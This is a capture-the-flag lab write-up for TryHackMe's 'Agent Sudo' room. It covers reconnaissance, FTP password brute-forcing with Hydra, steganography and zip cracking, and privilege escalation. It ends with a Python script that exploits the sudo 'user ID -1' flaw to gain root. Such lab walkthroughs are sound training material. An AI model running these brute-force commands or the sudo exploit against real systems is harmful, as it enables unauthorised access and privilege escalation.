Agent Sudo - TryHackMe

You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

Recon

I start port scanning with Nmap to find existing ports and services.

sudo nmap -sC -sV -oA nmap/agentsudo 10.10.133.149

I checked the website and wants me to change my user-agent

Brute-Force

“25 employees” suggesting letters in the alphabet. So I have decided to brute force using all the letters.

After changing my user name to “C” I got the following message.

Next, I decided to check out the FTP server. As I don’t have a password, I tried to brute-force using Hydra and rockyou.txt()

hydra -t 3 -l chris -P /home/sz/Documents/rockyou.txt 10.10.133.149 ftp

I got the password to log in to FTP.

After logging in I found two .png and one .txt file. After downloading them I checked out the message.

“stored in the fake picture” suggesting pictures are Steganography.

I brute-forced with Stegcracker and found the following text

Not very useful. For the other picture, I used binwalk to extract the files inside one of the images.

I found a zip file and brute-force that with John

Now I have the username and password to ssh.

After logging in ssh I found the user flag

OSINT

Inside I found an image

After a simple Google reverse image search, I found this article.

Privilege Escalation

After doing some basic enumeration I found a possible shell escaping way.

After doing some research I have found the following CVE.

I made a Python file with the following code.

#!/usr/bin/python3
import os
#Get current username
username = input("Enter current username :")
#check which binary the user can run with sudo
os.system("sudo -l > priv")
os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
binary_file = open("binary")
binary= binary_file.read()
#execute sudo exploit
print("Lets hope it works")
os.system("sudo -u#-1 "+ binary)